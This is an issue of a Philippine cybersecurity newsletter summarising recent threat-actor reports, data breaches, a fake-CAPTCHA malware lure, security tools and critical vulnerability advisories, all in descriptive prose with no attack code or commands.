- CyberSecurity.PH
- Posts
- CyberSecurity.PH #031
CyberSecurity.PH #031
China linked Earth Baxia threat; two new large PH data breaches; Telegram not encrypted; China linked Flax Typhoon threat; criminal comms platform Ghost takedown; Fake CAPTCHA verification spreads malware; Ransomware-Tool-Matrix; Unauthenticated RCE in all Linux; Zero-Click MediaTek vulnerability
Welcome to CyberSecurity.PH issue #031,
Hope to see you at RootCon this week, if you see us stop and say hello!
You can help improve cybersecurity outcomes in the Philippines by telling your friends about us or just subscribe their email address. We promise they will learn up-to-date valuable cybersecurity insights each week.
CyberSecurity.PH is not just an awesome newsletter, we also have (free)
Learning materials - plenty of learning cybersecurity learning material no matter what level you are at.
Engineering tools - and utilities to help conduct your cybersecurity tasks, we like open-source tools.
Plenty of policy templates - to help you get started with your own.
Key cybersecurity strategy papers covering cybersecurity in PH.
Local education providers - an updated list of the known cybersecurity education providers across PH.
Philippines
China linked Earth Baxia threat group targeting APAC governments including Philippines
Cybersecurity company Trend Micro have released a report that describes threat-actors group they’ve named “Earth Baxia” From their report - Based on the collected phishing emails, decoy documents, and observations from incidents, it appears that the targets are primarily government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand | Source: Trend Micro |
For the report - “we observed suspicious activity targeting a government organization in Taiwan, with other APAC countries also likely targeted, attributed to the threat actor Earth Baxia. In these campaigns, Earth Baxia used spear-phishing emails and exploited CVE-2024-36401, a vulnerability in an open-source server for sharing geospatial data called GeoServer” - Trend Micro: Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, Philip Chen
Further reading - Trend Micro, The Hacker News, Dark Reading, Cybersecurity News
Deep Web Konek / Kukublan Philippines: 2x new large data breaches
Unconventional news source, Kukublan Philippines continues with solid reporting on cyber crime activity in the Philippines, this week -
Massive data breach at the Villar Group of companies: 2.3 million sensitive data records exposed - kukublanph.data.blog
28 Million PH passport holders data at risk after cybersecurity failures according to the Department Foreign Affairs - kukublanph.data.blog
Philippines, we need to talk about Telegram
If you are using Telegram because it’s a delightful communications tool with friends and communities you interact with then great. If you are using Telegram because anything to do with “security” then please stop what you are doing, you are at risk and all the previous data you have exchanged on Telegram is at risk. Telegram is not an end-to-end encrypted communications platform and the Telegram app ability to establish end-to-end encrypted channels is difficult to access through user-interface and technically limited in implementation. |
Further reading - Cybersecurity.ph
Cybersecurity Threat Landscape
China linked Flax Typhoon threat group operating bot network with 260k infected devices
Shanghai stock exchange listed, PRC backed company, Integrity Technology Group (Integrity Tech) has been publicly named by FBI Director Christopher Wray as being responsible for running a botnet associated with the hacking group tracked as Flax Typhoon (also Raptor Train) - defense.gov report
The botnet comprised ~260k compromised Internet of Things (IoT) devices globally and was designed to steal sensitive information and disrupt critical services in the U.S. and other nations.
Compromised devices include well known device manufacturer names including; TP-Link, Zyxel, Mikrotik, D-Link, Hikvision, Panasonic, Qnap and Synology.
Further reading - The Register, Hack Read, Security Affairs, Bleeping Computer, Cyber.gov.au
Law enforcement takedowns and arrests over criminal communications platform 'Ghost'
A multi country law-enforcement takedown of the “Ghost” encrypted chat-device platform that was widely used by criminal networks was conducted last week.
Reports state that thousands of people worldwide used Ghost to exchange thousands of messages per day. Subscriptions for the network cost $2,350 USD for six months and included a modified smartphone handset.
The mastermind behind the Ghost app was based in Sydney, Australia where the Australian Federal Police (AFP) have arrested him.
Further Reading - AFP.gov.au, Bleeping Computer, Hack Read, The Record
China threat actors suspected in Pacific islands diplomatic hack
The Australian government sent cyber threat responders to Fiji earlier this year to assist the Pacific Islands Forum (PIF) after their networks were compromised by Chinese state-backed hackers.
The cyber attack on the PIF secretariat, which is based in Suva, was detected in February 2024, although the threat actors likely gained access before this. The secretariat has confirmed “that there was indeed a cybersecurity incident here this year.”
This hack is not an isolated incident, earlier this year the small Pacific nation of Palau accused China of stealing more than 20,000 documents related to its relations with the US, Japan and Taiwan.
Further reading - The Record, ABC News, ASPI Strategist
Fake CAPTCHA verification spreading Lumma info stealer malware
Several well-known security researchers are calling out the weird bot-prevention (or CAPTCHA verification) technique that has surfaced recently. Even though most readers here might recognize the attached image as being fishy enough that they’d probably not follow the instruction, not everyone would know better. | Source: Krebs on Security |
If you’re not sure what’s going on here -
The “Windows + R” key press opens up a Windows dialogue box that allows users to run commands directly in the operating system
The “Control + V” key press pastes into the previously opened command entry dialogue, where the website has crafted a special (and malicious) command line to be used.
The “Enter” is the end game
The outcome is that the victim gets a nasty surprise by installing Lumma info-stealer malware that vacuums up all system positions where credentials, tokens, session-authentication-cookies and secret keys are kept and are sent to threat actors.
It’s not dumb if it works.
Cybersecurity Engineering
A weekly highlight on tools and other resources (often open-source) that we use, find useful or is just plain interesting; check out our engineering-section online at CyberSecurity.PH too!
s0md3v/Photon - an incredibly fast crawler designed for open-source intelligence gathering - github.com/s0md3v/Photon
BushidoUK/Ransomware-Tool-Matrix - an excellent Blue Team resource cataloging the tools used by ransomware gangs - github.com/BushidoUK/Ransomware-Tool-Matrix
saw-your-packet/CloudShovel - A tool for scanning public or private AMIs for sensitive files and secrets - github.com/saw-your-packet/CloudShovel
Cybersecurity Vulnerabilities
Rumors of an unauthenticated remote-code-execution vulnerability in all Linux systems (CVSS 9.9)
There are rumors swirling of a high impact remote-code-execution vulnerability that impacts all(?) Linux systems due to be publicly released on October 6. The details are not at all clear and the issue has not received a CVE as is customary with such matters.
The individual making the claim (evilsocket, aka Simone Margaritelli) is known and well respected among cybersecurity developers so it’s not easy to dismiss the claim.
If true this will be a big deal and worth paying attention to.
Further reading - Cybersecurity News, Thread Reader
Zero-Click MediaTek vulnerability opens handheld devices and Wifi to takeover attacks (CVSS 9.8)
MediaTek might not be a name you know off hand, however their chipsets and associated drivers are the components that provide WiFi functionality in many devices and appliances you very likely use.
The vulnerability is an out-of-bounds write issue that resides in the wappd service that is responsible for configuring and managing wireless interfaces.
Most concerningly there is already a PoC exploit doing the rounds making the likelihood of this being weaponized quite high.
Further reading - SonicWall, Dark Reading, The Hacker News
GitLab patches vulnerability for critical SAML authentication bypass (CVSS 10.0)
GitLab has been updated to address an authentication bypass vulnerability that impacts self-managed installations of GitLab.
The vulnerability is tracked as CVE-2024-45409 and is caused by the OmniAuth-SAML and Ruby-SAML libraries that GitLab uses to handle SAML authentication.
Further reading - Bleeping Computer, Dark Reading
Yet another critical vulnerability in VMware vCenter that enables remote code execution (CVSS 9.8)
Broadcom have released updates to address CVE-2024-38812 (CVSS score: 9.8), in VMware vCenter that can lead to remote code execution.
“A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution.” reads the advisory.
Further reading - Security Affairs, Bleeping Computer
Yet another SolarWinds critical vulnerability in Access Rights Manager utility (CVSS 9.0)
This issue tracked as CVE-2024-28991 may allow remote threat actors to execute arbitrary code on vulnerable systems.
Further reading - Security Affairs, Security Week
Got news or something you’d like us to mention, feel free to get in contact - [email protected]